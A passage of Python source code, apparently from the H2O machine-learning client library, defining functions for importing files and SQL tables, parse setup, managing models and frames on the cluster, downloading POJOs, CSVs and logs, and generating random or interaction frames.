assert_is_type(col_names, [str], None)
assert_is_type(col_types, [coltype], {str: coltype}, None)
assert_is_type(na_strings, [natype], {str: natype}, None)
check_frame_id(destination_frame)
if path.startswith("~"):
path = os.path.expanduser(path)
return H2OFrame()._upload_parse(path, destination_frame, header, sep, col_names, col_types, na_strings)
def import_file(path=None, destination_frame=None, parse=True, header=0, sep=None, col_names=None, col_types=None,
na_strings=None, pattern=None):
"""
Import a dataset that is already on the cluster.
The path to the data must be a valid path for each node in the H2O cluster. If some node in the H2O cluster
cannot see the file, then an exception will be thrown by the H2O cluster. Does a parallel/distributed
multi-threaded pull of the data. The main difference between this method and :func:`upload_file` is that
the latter works with local files, whereas this method imports remote files (i.e. files local to the server).
If you running H2O server on your own maching, then both methods behave the same.
:param path: path(s) specifying the location of the data to import or a path to a directory of files to import
:param destination_frame: The unique hex key assigned to the imported file. If none is given, a key will be
automatically generated.
:param parse: If True, the file should be parsed after import. If False, then a list is returned containing the file path.
:param header: -1 means the first line is data, 0 means guess, 1 means first line is header.
:param sep: The field separator character. Values on each line of the file are separated by
this character. If not provided, the parser will automatically detect the separator.
:param col_names: A list of column names for the file.
:param col_types: A list of types or a dictionary of column names to types to specify whether columns
should be forced to a certain type upon import parsing. If a list, the types for elements that are
one will be guessed. The possible types a column may have are:
- "unknown" - this will force the column to be parsed as all NA
- "uuid" - the values in the column must be true UUID or will be parsed as NA
- "string" - force the column to be parsed as a string
- "numeric" - force the column to be parsed as numeric. H2O will handle the compression of the numeric
data in the optimal manner.
- "enum" - force the column to be parsed as a categorical column.
- "time" - force the column to be parsed as a time column. H2O will attempt to parse the following
list of date time formats: (date) "yyyy-MM-dd", "yyyy MM dd", "dd-MMM-yy", "dd MMM yy", (time)
"HH:mm:ss", "HH:mm:ss:SSS", "HH:mm:ss:SSSnnnnnn", "HH.mm.ss" "HH.mm.ss.SSS", "HH.mm.ss.SSSnnnnnn".
Times can also contain "AM" or "PM".
:param na_strings: A list of strings, or a list of lists of strings (one list per column), or a dictionary
of column names to strings which are to be interpreted as missing values.
:param pattern: Character string containing a regular expression to match file(s) in the folder if `path` is a
directory.
:returns: a new :class:`H2OFrame` instance.
:examples:
>>> # Single file import
>>> iris = import_file("h2o-3/smalldata/iris.csv")
>>> # Return all files in the folder iris/ matching the regex r"iris_.*\.csv"
>>> iris_pattern = h2o.import_file(path = "h2o-3/smalldata/iris",
... pattern = "iris_.*\.csv")
"""
coltype = U(None, "unknown", "uuid", "string", "float", "real", "double", "int", "numeric",
"categorical", "factor", "enum", "time")
natype = U(str, [str])
assert_is_type(path, str, [str])
assert_is_type(pattern, str, None)
assert_is_type(destination_frame, str, None)
assert_is_type(parse, bool)
assert_is_type(header, -1, 0, 1)
assert_is_type(sep, None, I(str, lambda s: len(s) == 1))
assert_is_type(col_names, [str], None)
assert_is_type(col_types, [coltype], {str: coltype}, None)
assert_is_type(na_strings, [natype], {str: natype}, None)
check_frame_id(destination_frame)
patharr = path if isinstance(path, list) else [path]
if any(os.path.split(p)[0] == "~" for p in patharr):
raise H2OValueError("Paths relative to a current user (~) are not valid in the server environment. "
"Please use absolute paths if possible.")
if not parse:
return lazy_import(path, pattern)
else:
return H2OFrame()._import_parse(path, pattern, destination_frame, header, sep, col_names, col_types, na_strings)
def import_sql_table(connection_url, table, username, password, columns=None, optimize=True):
"""
Import SQL table to H2OFrame in memory.
Assumes that the SQL table is not being updated and is stable.
Runs multiple SELECT SQL queries concurrently for parallel ingestion.
Be sure to start the h2o.jar in the terminal with your downloaded JDBC driver in the classpath::
java -cp <path_to_h2o_jar>:<path_to_jdbc_driver_jar> water.H2OApp
Also see :func:`import_sql_select`.
Currently supported SQL databases are MySQL, PostgreSQL, and MariaDB. Support for Oracle 12g and Microsoft SQL
Server is forthcoming.
:param connection_url: URL of the SQL database connection as specified by the Java Database Connectivity (JDBC)
Driver. For example, "jdbc:mysql://localhost:3306/menagerie?&useSSL=false"
:param table: name of SQL table
:param columns: a list of column names to import from SQL table. Default is to import all columns.
:param username: username for SQL server
:param password: password for SQL server
:param optimize: optimize import of SQL table for faster imports. Experimental.
:returns: an :class:`H2OFrame` containing data of the specified SQL table.
:examples:
>>> conn_url = "jdbc:mysql://172.16.2.178:3306/ingestSQL?&useSSL=false"
>>> table = "citibike20k"
>>> username = "root"
>>> password = "abc123"
>>> my_citibike_data = h2o.import_sql_table(conn_url, table, username, password)
"""
assert_is_type(connection_url, str)
assert_is_type(table, str)
assert_is_type(username, str)
assert_is_type(password, str)
assert_is_type(columns, [str], None)
assert_is_type(optimize, bool)
p = {"connection_url": connection_url, "table": table, "username": username, "password": password, "optimize": optimize}
if columns:
p["columns"] = ", ".join(columns)
j = H2OJob(api("POST /99/ImportSQLTable", data=p), "Import SQL Table").poll()
return get_frame(j.dest_key)
def import_sql_select(connection_url, select_query, username, password, optimize=True):
"""
Import the SQL table that is the result of the specified SQL query to H2OFrame in memory.
Creates a temporary SQL table from the specified sql_query.
Runs multiple SELECT SQL queries on the temporary table concurrently for parallel ingestion, then drops the table.
Be sure to start the h2o.jar in the terminal with your downloaded JDBC driver in the classpath::
java -cp <path_to_h2o_jar>:<path_to_jdbc_driver_jar> water.H2OApp
Also see h2o.import_sql_table. Currently supported SQL databases are MySQL, PostgreSQL, and MariaDB. Support
for Oracle 12g and Microsoft SQL Server is forthcoming.
:param connection_url: URL of the SQL database connection as specified by the Java Database Connectivity (JDBC)
Driver. For example, "jdbc:mysql://localhost:3306/menagerie?&useSSL=false"
:param select_query: SQL query starting with `SELECT` that returns rows from one or more database tables.
:param username: username for SQL server
:param password: password for SQL server
:param optimize: optimize import of SQL table for faster imports. Experimental.
:returns: an :class:`H2OFrame` containing data of the specified SQL query.
:examples:
>>> conn_url = "jdbc:mysql://172.16.2.178:3306/ingestSQL?&useSSL=false"
>>> select_query = "SELECT bikeid from citibike20k"
>>> username = "root"
>>> password = "abc123"
>>> my_citibike_data = h2o.import_sql_select(conn_url, select_query,
... username, password)
"""
assert_is_type(connection_url, str)
assert_is_type(select_query, str)
assert_is_type(username, str)
assert_is_type(password, str)
assert_is_type(optimize, bool)
p = {"connection_url": connection_url, "select_query": select_query, "username": username, "password": password,
"optimize": optimize}
j = H2OJob(api("POST /99/ImportSQLTable", data=p), "Import SQL Table").poll()
return get_frame(j.dest_key)
def parse_setup(raw_frames, destination_frame=None, header=0, separator=None, column_names=None,
column_types=None, na_strings=None):
"""
Retrieve H2O's best guess as to what the structure of the data file is.
During parse setup, the H2O cluster will make several guesses about the attributes of
the data. This method allows a user to perform corrective measures by updating the
returning dictionary from this method. This dictionary is then fed into `parse_raw` to
produce the H2OFrame instance.
:param raw_frames: a collection of imported file frames
:param destination_frame: The unique hex key assigned to the imported file. If none is given, a key will
automatically be generated.
:param header: -1 means the first line is data, 0 means guess, 1 means first line is header.
:param separator: The field separator character. Values on each line of the file are separated by
this character. If not provided, the parser will automatically detect the separator.
:param column_names: A list of column names for the file.
:param column_types: A list of types or a dictionary of column names to types to specify whether columns
should be forced to a certain type upon import parsing. If a list, the types for elements that are
one will be guessed. The possible types a column may have are:
- "unknown" - this will force the column to be parsed as all NA
- "uuid" - the values in the column must be true UUID or will be parsed as NA
- "string" - force the column to be parsed as a string
- "numeric" - force the column to be parsed as numeric. H2O will handle the compression of the numeric
data in the optimal manner.
- "enum" - force the column to be parsed as a categorical column.
- "time" - force the column to be parsed as a time column. H2O will attempt to parse the following
list of date time formats: (date) "yyyy-MM-dd", "yyyy MM dd", "dd-MMM-yy", "dd MMM yy", (time)
"HH:mm:ss", "HH:mm:ss:SSS", "HH:mm:ss:SSSnnnnnn", "HH.mm.ss" "HH.mm.ss.SSS", "HH.mm.ss.SSSnnnnnn".
Times can also contain "AM" or "PM".
:param na_strings: A list of strings, or a list of lists of strings (one list per column), or a dictionary
of column names to strings which are to be interpreted as missing values.
:returns: a dictionary containing parse parameters guessed by the H2O backend.
"""
coltype = U(None, "unknown", "uuid", "string", "float", "real", "double", "int", "numeric",
"categorical", "factor", "enum", "time")
natype = U(str, [str])
assert_is_type(raw_frames, str, [str])
assert_is_type(destination_frame, None, str)
assert_is_type(header, -1, 0, 1)
assert_is_type(separator, None, I(str, lambda s: len(s) == 1))
assert_is_type(column_names, [str], None)
assert_is_type(column_types, [coltype], {str: coltype}, None)
assert_is_type(na_strings, [natype], {str: natype}, None)
check_frame_id(destination_frame)
# The H2O backend only accepts things that are quoted
if is_type(raw_frames, str): raw_frames = [raw_frames]
# temporary dictionary just to pass the following information to the parser: header, separator
kwargs = {"check_header": header, "source_frames": [quoted(frame_id) for frame_id in raw_frames]}
if separator:
kwargs["separator"] = ord(separator)
j = api("POST /3/ParseSetup", data=kwargs)
if "warnings" in j and j["warnings"]:
for w in j["warnings"]:
warnings.warn(w)
# TODO: really should be url encoding...
# TODO: clean up all this
if destination_frame:
j["destination_frame"] = destination_frame
if column_names is not None:
if not isinstance(column_names, list): raise ValueError("col_names should be a list")
if len(column_names) != len(j["column_types"]): raise ValueError(
"length of col_names should be equal to the number of columns: %d vs %d"
% (len(column_names), len(j["column_types"])))
j["column_names"] = column_names
if column_types is not None:
if isinstance(column_types, dict):
# overwrite dictionary to ordered list of column types. if user didn't specify column type for all names,
# use type provided by backend
if j["column_names"] is None: # no colnames discovered! (C1, C2, ...)
j["column_names"] = gen_header(j["number_columns"])
if not set(column_types.keys()).issubset(set(j["column_names"])): raise ValueError(
"names specified in col_types is not a subset of the column names")
idx = 0
column_types_list = []
for name in j["column_names"]:
if name in column_types:
column_types_list.append(column_types[name])
else:
column_types_list.append(j["column_types"][idx])
idx += 1
column_types = column_types_list
elif isinstance(column_types, list):
if len(column_types) != len(j["column_types"]): raise ValueError(
"length of col_types should be equal to the number of columns")
column_types = [column_types[i] if column_types[i] else j["column_types"][i] for i in
range(len(column_types))]
else: # not dictionary or list
raise ValueError("col_types should be a list of types or a dictionary of column names to types")
j["column_types"] = column_types
if na_strings is not None:
if isinstance(na_strings, dict):
# overwrite dictionary to ordered list of lists of na_strings
if not j["column_names"]: raise ValueError("column names should be specified")
if not set(na_strings.keys()).issubset(set(j["column_names"])): raise ValueError(
"names specified in na_strings is not a subset of the column names")
j["na_strings"] = [[] for _ in range(len(j["column_names"]))]
for name, na in na_strings.items():
idx = j["column_names"].index(name)
if is_type(na, str): na = [na]
for n in na: j["na_strings"][idx].append(quoted(n))
elif is_type(na_strings, [[str]]):
if len(na_strings) != len(j["column_types"]):
raise ValueError("length of na_strings should be equal to the number of columns")
j["na_strings"] = [[quoted(na) for na in col] if col is not None else [] for col in na_strings]
elif isinstance(na_strings, list):
j["na_strings"] = [[quoted(na) for na in na_strings]] * len(j["column_types"])
else: # not a dictionary or list
raise ValueError(
"na_strings should be a list, a list of lists (one list per column), or a dictionary of column "
"names to strings which are to be interpreted as missing values")
# quote column names and column types also when not specified by user
if j["column_names"]: j["column_names"] = list(map(quoted, j["column_names"]))
j["column_types"] = list(map(quoted, j["column_types"]))
return j
def parse_raw(setup, id=None, first_line_is_header=0):
"""
Parse dataset using the parse setup structure.
:param setup: Result of ``h2o.parse_setup()``
:param id: an id for the frame.
:param first_line_is_header: -1, 0, 1 if the first line is to be used as the header
:returns: an :class:`H2OFrame` object.
"""
assert_is_type(setup, dict)
assert_is_type(id, str, None)
assert_is_type(first_line_is_header, -1, 0, 1)
check_frame_id(id)
if id:
setup["destination_frame"] = id
if first_line_is_header != (-1, 0, 1):
if first_line_is_header not in (-1, 0, 1): raise ValueError("first_line_is_header should be -1, 0, or 1")
setup["check_header"] = first_line_is_header
fr = H2OFrame()
fr._parse_raw(setup)
return fr
def assign(data, xid):
"""
(internal) Assign new id to the frame.
:param data: an H2OFrame whose id should be changed
:param xid: new id for the frame.
:returns: the passed frame.
"""
assert_is_type(data, H2OFrame)
assert_is_type(xid, str)
assert_satisfies(xid, xid != data.frame_id)
check_frame_id(xid)
data._ex = ExprNode("assign", xid, data)._eval_driver(False)
data._ex._cache._id = xid
data._ex._children = None
return data
def deep_copy(data, xid):
"""
Create a deep clone of the frame ``data``.
:param data: an H2OFrame to be cloned
:param xid: (internal) id to be assigned to the new frame.
:returns: new :class:`H2OFrame` which is the clone of the passed frame.
"""
assert_is_type(data, H2OFrame)
assert_is_type(xid, str)
assert_satisfies(xid, xid != data.frame_id)
check_frame_id(xid)
duplicate = data.apply(lambda x: x)
duplicate._ex = ExprNode("assign", xid, duplicate)._eval_driver(False)
duplicate._ex._cache._id = xid
duplicate._ex._children = None
return duplicate
def get_model(model_id):
"""
Load a model from the server.
:param model_id: The model identification in H2O
:returns: Model object, a subclass of H2OEstimator
"""
assert_is_type(model_id, str)
model_json = api("GET /3/Models/%s" % model_id)["models"][0]
algo = model_json["algo"]
if algo == "svd": m = H2OSVD()
elif algo == "pca": m = H2OPCA()
elif algo == "drf": m = H2ORandomForestEstimator()
elif algo == "naivebayes": m = H2ONaiveBayesEstimator()
elif algo == "kmeans": m = H2OKMeansEstimator()
elif algo == "glrm": m = H2OGeneralizedLowRankEstimator()
elif algo == "glm": m = H2OGeneralizedLinearEstimator()
elif algo == "gbm": m = H2OGradientBoostingEstimator()
elif algo == "deepwater": m = H2ODeepWaterEstimator()
elif algo == "xgboost": m = H2OXGBoostEstimator()
elif algo == "word2vec": m = H2OWord2vecEstimator()
elif algo == "deeplearning":
if model_json["output"]["model_category"] == "AutoEncoder":
m = H2OAutoEncoderEstimator()
else:
m = H2ODeepLearningEstimator()
elif algo == "stackedensemble": m = H2OStackedEnsembleEstimator()
else:
raise ValueError("Unknown algo type: " + algo)
m._resolve_model(model_id, model_json)
return m
def get_grid(grid_id):
"""
Return the specified grid.
:param grid_id: The grid identification in h2o
:returns: an :class:`H2OGridSearch` instance.
"""
assert_is_type(grid_id, str)
grid_json = api("GET /99/Grids/%s" % grid_id)
models = [get_model(key["name"]) for key in grid_json["model_ids"]]
# get first model returned in list of models from grid search to get model class (binomial, multinomial, etc)
first_model_json = api("GET /3/Models/%s" % grid_json["model_ids"][0]["name"])["models"][0]
gs = H2OGridSearch(None, {}, grid_id)
gs._resolve_grid(grid_id, grid_json, first_model_json)
gs.models = models
hyper_params = {param: set() for param in gs.hyper_names}
for param in gs.hyper_names:
for model in models:
if isinstance(model.full_parameters[param]["actual_value"], list):
hyper_params[param].add(model.full_parameters[param]["actual_value"][0])
else:
hyper_params[param].add(model.full_parameters[param]["actual_value"])
hyper_params = {str(param): list(vals) for param, vals in hyper_params.items()}
gs.hyper_params = hyper_params
gs.model = model.__class__()
return gs
def get_frame(frame_id):
"""
Obtain a handle to the frame in H2O with the frame_id key.
:param str frame_id: id of the frame to retrieve.
:returns: an :class:`H2OFrame` object
"""
assert_is_type(frame_id, str)
return H2OFrame.get_frame(frame_id)
def no_progress():
"""
Disable the progress bar from flushing to stdout.
The completed progress bar is printed when a job is complete so as to demarcate a log file.
"""
H2OJob.__PROGRESS_BAR__ = False
def show_progress():
"""Enable the progress bar (it is enabled by default)."""
H2OJob.__PROGRESS_BAR__ = True
def enable_expr_optimizations(flag):
"""Enable expression tree local optimizations."""
ExprNode.__ENABLE_EXPR_OPTIMIZATIONS__ = flag
def is_expr_optimizations_enabled():
return ExprNode.__ENABLE_EXPR_OPTIMIZATIONS__
def log_and_echo(message=""):
"""
Log a message on the server-side logs.
This is helpful when running several pieces of work one after the other on a single H2O
cluster and you want to make a notation in the H2O server side log where one piece of
work ends and the next piece of work begins.
Sends a message to H2O for logging. Generally used for debugging purposes.
:param message: message to write to the log.
"""
assert_is_type(message, str)
api("POST /3/LogAndEcho", data={"message": str(message)})
def remove(x):
"""
Remove object(s) from H2O.
:param x: H2OFrame, H2OEstimator, or string, or a list of those things: the object(s) or unique id(s)
pointing to the object(s) to be removed.
"""
item_type = U(str, H2OFrame, H2OEstimator)
assert_is_type(x, item_type, [item_type])
if not isinstance(x, list): x = [x]
for xi in x:
if isinstance(xi, H2OFrame):
xi_id = xi._ex._cache._id # String or None
if xi_id is None: return # Lazy frame, never evaluated, nothing in cluster
rapids("(rm {})".format(xi_id))
xi._ex = None
elif isinstance(xi, H2OEstimator):
api("DELETE /3/DKV/%s" % xi.model_id)
xi._id = None
else:
# string may be a Frame key name part of a rapids session... need to call rm thru rapids here
try:
rapids("(rm {})".format(xi))
except:
api("DELETE /3/DKV/%s" % xi)
def remove_all():
"""Remove all objects from H2O."""
api("DELETE /3/DKV")
def rapids(expr):
"""
Execute a Rapids expression.
:param expr: The rapids expression (ascii string).
:returns: The JSON response (as a python dictionary) of the Rapids execution.
"""
assert_is_type(expr, str)
return ExprNode.rapids(expr)
def ls():
"""List keys on an H2O Cluster."""
return H2OFrame._expr(expr=ExprNode("ls")).as_data_frame(use_pandas=True)
def frame(frame_id):
"""
Retrieve metadata for an id that points to a Frame.
:param frame_id: the key of a Frame in H2O.
:returns: dict containing the frame meta-information.
"""
assert_is_type(frame_id, str)
return api("GET /3/Frames/%s" % frame_id)
def frames():
"""
Retrieve all the Frames.
:returns: Meta information on the frames
"""
return api("GET /3/Frames")
def download_pojo(model, path="", get_jar=True, jar_name=""):
"""
Download the POJO for this model to the directory specified by path; if path is "", then dump to screen.
:param model: the model whose scoring POJO should be retrieved.
:param path: an absolute path to the directory where POJO should be saved.
:param get_jar: retrieve the h2o-genmodel.jar also (will be saved to the same folder ``path``).
:param jar_name: Custom name of genmodel jar.
:returns: location of the downloaded POJO file.
"""
assert_is_type(model, ModelBase)
assert_is_type(path, str)
assert_is_type(get_jar, bool)
if not model.have_pojo:
raise H2OValueError("Export to POJO not supported")
if path == "":
java_code = api("GET /3/Models.java/%s" % model.model_id)
print(java_code)
return None
else:
filename = api("GET /3/Models.java/%s" % model.model_id, save_to=path)
if get_jar:
if jar_name == "":
api("GET /3/h2o-genmodel.jar", save_to=os.path.join(path, "h2o-genmodel.jar"))
else:
api("GET /3/h2o-genmodel.jar", save_to=os.path.join(path, jar_name))
return filename
def download_csv(data, filename):
"""
Download an H2O data set to a CSV file on the local disk.
Warning: Files located on the H2O server may be very large! Make sure you have enough
hard drive space to accommodate the entire file.
:param data: an H2OFrame object to be downloaded.
:param filename: name for the CSV file where the data should be saved to.
"""
assert_is_type(data, H2OFrame)
assert_is_type(filename, str)
url = h2oconn.make_url("DownloadDataset", 3) + "?frame_id={}&hex_string=false".format(data.frame_id)
with open(filename, "wb") as f:
f.write(urlopen()(url).read())
def download_all_logs(dirname=".", filename=None):
"""
Download H2O log files to disk.
:param dirname: a character string indicating the directory that the log file should be saved in.
:param filename: a string indicating the name that the CSV file should be. Note that the saved format is .zip, so the file name must include the .zip extension.
:returns: path of logs written in a zip file.
:examples: The following code will save the zip file `'autoh2o_log.zip'` in a directory that is one down from where you are currently working into a directory called `your_directory_name`. (Please note that `your_directory_name` should be replaced with the name of the directory that you've created and that already exists.)
>>> h2o.download_all_logs(dirname='./your_directory_name/', filename = 'autoh2o_log.zip')
"""
assert_is_type(dirname, str)
assert_is_type(filename, str, None)
url = "%s/3/Logs/download" % h2oconn.base_url
opener = urlopen()
response = opener(url)
if not os.path.exists(dirname): os.mkdir(dirname)
if filename is None:
if PY3:
headers = [h[1] for h in response.headers._headers]
else:
headers = response.headers.headers
for h in headers:
if "filename=" in h:
filename = h.split("filename=")[1].strip()
break
path = os.path.join(dirname, filename)
response = opener(url).read()
print("Writing H2O logs to " + path)
with open(path, "wb") as f:
f.write(response)
return path
def save_model(model, path="", force=False):
"""
Save an H2O Model object to disk. (Note that ensemble binary models can now be saved using this method.)
:param model: The model object to save.
:param path: a path to save the model at (hdfs, s3, local)
:param force: if True overwrite destination directory in case it exists, or throw exception if set to False.
:returns: the path of the saved model
:examples:
>>> path = h2o.save_model(my_model, dir=my_path)
"""
assert_is_type(model, ModelBase)
assert_is_type(path, str)
assert_is_type(force, bool)
path = os.path.join(os.getcwd() if path == "" else path, model.model_id)
return api("GET /99/Models.bin/%s" % model.model_id, data={"dir": path, "force": force})["dir"]
def load_model(path):
"""
Load a saved H2O model from disk. (Note that ensemble binary models can now be loaded using this method.)
:param path: the full path of the H2O Model to be imported.
:returns: an :class:`H2OEstimator` object
:examples:
>>> path = h2o.save_model(my_model, dir=my_path)
>>> h2o.load_model(path)
"""
assert_is_type(path, str)
res = api("POST /99/Models.bin/%s" % "", data={"dir": path})
return get_model(res["models"][0]["model_id"]["name"])
def export_file(frame, path, force=False, parts=1):
"""
Export a given H2OFrame to a path on the machine this python session is currently connected to.
:param frame: the Frame to save to disk.
:param path: the path to the save point on disk.
:param force: if True, overwrite any preexisting file with the same path
:param parts: enables export to multiple 'part' files instead of just a single file.
Convenient for large datasets that take too long to store in a single file.
Use parts=-1 to instruct H2O to determine the optimal number of part files or
specify your desired maximum number of part files. Path needs to be a directory
when exporting to multiple files, also that directory must be empty.
Default is ``parts = 1``, which is to export to a single file.
"""
assert_is_type(frame, H2OFrame)
assert_is_type(path, str)
assert_is_type(force, bool)
assert_is_type(parts, int)
H2OJob(api("POST /3/Frames/%s/export" % (frame.frame_id), data={"path": path, "num_parts": parts, "force": force}),
"Export File").poll()
def cluster():
"""Return :class:`H2OCluster` object describing the backend H2O cloud."""
return h2oconn.cluster if h2oconn else None
def create_frame(frame_id=None, rows=10000, cols=10, randomize=True,
real_fraction=None, categorical_fraction=None, integer_fraction=None,
binary_fraction=None, time_fraction=None, string_fraction=None,
value=0, real_range=100, factors=100, integer_range=100,
binary_ones_fraction=0.02, missing_fraction=0.01,
has_response=False, response_factors=2, positive_response=False,
seed=None, seed_for_column_types=None):
"""
Create a new frame with random data.
Creates a data frame in H2O with real-valued, categorical, integer, and binary columns specified by the user.
:param frame_id: the destination key. If empty, this will be auto-generated.
:param rows: the number of rows of data to generate.
:param cols: the number of columns of data to generate. Excludes the response column if has_response is True.
:param randomize: If True, data values will be randomly generated. This must be True if either
categorical_fraction or integer_fraction is non-zero.
:param value: if randomize is False, then all real-valued entries will be set to this value.
:param real_range: the range of randomly generated real values.
:param real_fraction: the fraction of columns that are real-valued.
:param categorical_fraction: the fraction of total columns that are categorical.
:param factors: the number of (unique) factor levels in each categorical column.
:param integer_fraction: the fraction of total columns that are integer-valued.
:param integer_range: the range of randomly generated integer values.
:param binary_fraction: the fraction of total columns that are binary-valued.
:param binary_ones_fraction: the fraction of values in a binary column that are set to 1.
:param time_fraction: the fraction of randomly created date/time columns.
:param string_fraction: the fraction of randomly created string columns.
:param missing_fraction: the fraction of total entries in the data frame that are set to NA.
:param has_response: A logical value indicating whether an additional response column should be prepended to the
final H2O data frame. If set to True, the total number of columns will be ``cols + 1``.
:param response_factors: if has_response is True, then this variable controls the type of the "response" column:
setting response_factors to 1 will generate real-valued response, any value greater or equal than 2 will
create categorical response with that many categories.
:param positive_reponse: when response variable is present and of real type, this will control whether it
contains positive values only, or both positive and negative.
:param seed: a seed used to generate random values when ``randomize`` is True.
:param seed_for_column_types: a seed used to generate random column types when ``randomize`` is True.
:returns: an :class:`H2OFrame` object
"""
t_fraction = U(None, BoundNumeric(0, 1))
assert_is_type(frame_id, str, None)
assert_is_type(rows, BoundInt(1))
assert_is_type(cols, BoundInt(1))
assert_is_type(randomize, bool)
assert_is_type(value, numeric)
assert_is_type(real_range, BoundNumeric(0))
assert_is_type(real_fraction, t_fraction)
assert_is_type(categorical_fraction, t_fraction)
assert_is_type(integer_fraction, t_fraction)
assert_is_type(binary_fraction, t_fraction)
assert_is_type(time_fraction, t_fraction)
assert_is_type(string_fraction, t_fraction)
assert_is_type(missing_fraction, t_fraction)
assert_is_type(binary_ones_fraction, t_fraction)
assert_is_type(factors, BoundInt(1))
assert_is_type(integer_range, BoundInt(1))
assert_is_type(has_response, bool)
assert_is_type(response_factors, None, BoundInt(1))
assert_is_type(positive_response, bool)
assert_is_type(seed, int, None)
assert_is_type(seed_for_column_types, int, None)
check_frame_id(frame_id)
if randomize and value:
raise H2OValueError("Cannot set data to a `value` if `randomize` is true")
if (categorical_fraction or integer_fraction) and not randomize:
raise H2OValueError("`randomize` should be True when either categorical or integer columns are used.")
# The total column fraction that the user has specified explicitly. This sum should not exceed 1. We will respect
# all explicitly set fractions, and will auto-select the remaining fractions.
frcs = [real_fraction, categorical_fraction, integer_fraction, binary_fraction, time_fraction, string_fraction]
wgts = [0.5, 0.2, 0.2, 0.1, 0.0, 0.0]
sum_explicit_fractions = sum(0 if f is None else f for f in frcs)
count_explicit_fractions = sum(0 if f is None else 1 for f in frcs)
remainder = 1 - sum_explicit_fractions
if sum_explicit_fractions >= 1 + 1e-10:
raise H2OValueError("Fractions of binary, integer, categorical, time and string columns should add up "
"to a number less than 1.")
elif sum_explicit_fractions >= 1 - 1e-10:
# The fractions already add up to almost 1. No need to do anything (the server will absorb the tiny
# remainder into the real_fraction column).
pass
else:
# sum_explicit_fractions < 1 => distribute the remainder among the columns that were not set explicitly
if count_explicit_fractions == 6:
raise H2OValueError("Fraction of binary, integer, categorical, time and string columns add up to a "
"number less than 1.")
# Each column type receives a certain part (proportional to column's "weight") of the remaining fraction.
sum_implicit_weights = sum(wgts[i] if frcs[i] is None else 0 for i in range(6))
for i, f in enumerate(frcs):
if frcs[i] is not None: continue
if sum_implicit_weights == 0:
frcs[i] = remainder
else:
frcs[i] = remainder * wgts[i] / sum_implicit_weights
remainder -= frcs[i]
sum_implicit_weights -= wgts[i]
for i, f in enumerate(frcs):
if f is None:
frcs[i] = 0
real_fraction, categorical_fraction, integer_fraction, binary_fraction, time_fraction, string_fraction = frcs
parms = {"dest": frame_id if frame_id else py_tmp_key(append=h2oconn.session_id),
"rows": rows,
"cols": cols,
"randomize": randomize,
"categorical_fraction": categorical_fraction,
"integer_fraction": integer_fraction,
"binary_fraction": binary_fraction,
"time_fraction": time_fraction,
"string_fraction": string_fraction,
# "real_fraction" is not provided, the backend computes it as 1 - sum(5 other fractions)
"value": value,
"real_range": real_range,
"factors": factors,
"integer_range": integer_range,
"binary_ones_fraction": binary_ones_fraction,
"missing_fraction": missing_fraction,
"has_response": has_response,
"response_factors": response_factors,
"positive_response": positive_response,
"seed": -1 if seed is None else seed,
"seed_for_column_types": -1 if seed_for_column_types is None else seed_for_column_types,
}
H2OJob(api("POST /3/CreateFrame", data=parms), "Create Frame").poll()
return get_frame(parms["dest"])
def interaction(data, factors, pairwise, max_factors, min_occurrence, destination_frame=None):
"""
Categorical Interaction Feature Creation in H2O.
Creates a frame in H2O with n-th order interaction features between categorical columns, as specified by
the user.
:param data: the H2OFrame that holds the target categorical columns.
:param factors: factor columns (either indices or column names).
:param pairwise: If True, create pairwise interactions between factors (otherwise create one
higher-order interaction). Only applicable if there are 3 or more factors.
:param max_factors: Max. number of factor levels in pair-wise interaction terms (if enforced, one extra
catch-all factor will be made).
:param min_occurrence: Min. occurrence threshold for factor levels in pair-wise interaction terms
:param destination_frame: a string indicating the destination key. If empty, this will be auto-generated by H2O.
:returns: :class:`H2OFrame`
"""
assert_is_type(data, H2OFrame)
assert_is_type(factors, [str, int])
assert_is_type(pairwise, bool)
assert_is_type(max_factors, int)
assert_is_type(min_occurrence, int)
assert_is_type(destination_frame, str, None)
factors = [data.names[n] if is_type(n, int) else n for n in factors]
parms = {"dest": py_tmp_key(append=h2oconn.session_id) if destination_frame is None else destination_frame,
"source_frame": data.frame_id,
"factor_columns": [quoted(f) for f in factors],
"pairwise": pairwise,
"max_factors": max_factors,
"min_occurrence": min_occurrence,
}
H2OJob(api("POST /3/Interaction", data=parms), "Interactions").poll()
return get_frame(parms["dest"])
def as_list(data, use_pandas=True, header=True):
"""
Convert an H2O data object into a python-specific object.
WARNING! This will pull all data local!
If Pandas is available (and use_pandas is True), then pandas will be used to parse the
data frame. Otherwise, a list-of-lists populated by character data will be returned (so
the types of data will all be str).
:param data: an H2O data object.
:param use_pandas: If True, try to use pandas for reading in the data.
:param header: If True, return column names as first element in list
:returns: List of lists (Rows x Columns).
"""
assert_is_type(data, H2OFrame)
assert_is_type(use_pandas, bool)
assert_is_type(header, bool)
return H2OFrame.as_data_frame(data, use_pandas=use_pandas, header=header)
def demo(funcname, interactive=True, echo=True, test=False):
"""
H2O built-in demo facility.
:param funcname: A string that identifies the h2o python function to demonstrate.
:param interactive: If True, the user will be prompted to continue the demonstration after every segment.
:param echo: If True, the python commands that are executed will be displayed.
:param test: If True, `h2o.init()` will not be called (used for pyunit testing).
:example:
>>> import h2o
>>> h2o.demo("gbm")
"""
import h2o.demos as h2odemo
assert_is_type(funcname, str)
assert_is_type(interactive, bool)
assert_is_type(echo, bool)
assert_is_type(test, bool)
demo_function = getattr(h2odemo, funcname, None)
if demo_function and type(demo_function) is type(demo):
demo_function(interactive, echo, test)
else:
print("Demo for %s is not available." % funcname)
def load_dataset(relative_path):
"""Imports a data file within the 'h2o_data' folder."""
assert_is_type(relative_path, str)
h2o_dir = os.path.split(__file__)[0]
for possible_file in [os.path.join(h2o_dir, relative_path),
os.path.join(h2o_dir, "h2o_data", relative_path),
os.path.join(h2o_dir, "h2o_data", relative_path + ".csv")]:
if os.path.exists(possible_file):
return upload_file(possible_file)
# File not found -- raise an error!
raise H2OValueError("Data file %s cannot be found" % relative_path)
def make_metrics(predicted, actual, domain=None, distribution=None):
"""
Create Model Metrics from predicted and actual values in H2O.
:param H2OFrame predicted: an H2OFrame containing predictions.
:param H2OFrame actuals: an H2OFrame containing actual values.
:param domain: list of response factors for classification.
:param distribution: distribution for regression.
"""
assert_is_type(predicted, H2OFrame)
assert_is_type(actual, H2OFrame)
# assert predicted.ncol == 1, "`predicted` frame should have exactly 1 column"
assert actual.ncol == 1, "`actual` frame should have exactly 1 column"
assert_is_type(distribution, str, None)
assert_satisfies(actual.ncol, actual.ncol == 1)
if domain is None and any(actual.isfactor()):
domain = actual.levels()[0]
